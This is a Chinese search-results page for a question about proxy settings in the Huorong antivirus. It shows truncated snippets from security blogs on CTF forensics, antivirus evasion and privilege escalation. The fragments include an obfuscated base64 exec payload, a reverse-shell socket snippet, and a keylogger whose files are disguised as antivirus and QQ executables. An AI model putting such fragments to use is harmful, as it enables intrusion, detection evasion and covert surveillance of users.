-
2023首届盘古石杯决赛复盘
使用原始数据存储为setup.exe,刚保存出来,火绒就弹出来给隔离了,确认就是他 13.木马文件伪造的软件版本是?[答案:0.0.0.0] 7.5.0.1039 14.黑客上传到网盘的压缩包解压密码.
-
红队作业 | MSF源码级别免杀实录
可以看到落地火绒报毒: 看下源码: ```exec(_import_('base64').b64decode(_import_('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5...
-
Gopher协议的妙用
}voidfilter_port(int sock_raw,int port){ struct sock_filter bpf_code[]={ { 0x28,0,0,0x0000000c },{ 0x15,0,6,0x000086dd },{ 0x30,0,0,0x00000014 },{ 0x15,0,15,0x00000006 },{ 0x28,0,0...
-
监控键盘和鼠标记录内容和截屏,更新版本2.0,增加了Linux服务端!!!
py==火绒.exe、SocketWinClient.py==QQ.exe、SocketWinServer.py==双击运行服务端.exe这里只讲部分核心源码,如果要看...
-
proxychains配置遇到了问题
所以我们需要利用中转服务器做一个sock5代理。那么win7是通外.服务是怎么理解的如...
-
TideSec远控免杀学习一(免杀基础+msfvenom隐藏的参数)
实验主要是使用了metasploit或cobaltstrike生成的代码或程序进行免杀处理,在实验机器上安装了360全家桶和火绒进行本地测试,在 https://www.virustotal.com/ 上进行在线查杀。杀毒软件的检测方式扫描技术扫描压缩包技术:即是...
-
window 提权
args()HOST=arguments.host PORT=arguments.ports=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((HOST,PORT))async def shell():while 1:proc=await asyncio.create_subprocess_...
-
一款用于追捕对方IP软件
2 、可以查询对方 IP 的域 名,可以查询对方机器上的提供的服务功能,包括 WWW/FTP/DNS/SOCK/ TELNET/POP3/SMTP/NETSPY/NETBIOS/GOPHER.3、可以从命令...
火绒怎么设置sock5
相关内容浏览更多安心,自主掌握个人信息!
我们尊重您的隐私,只浏览不追踪
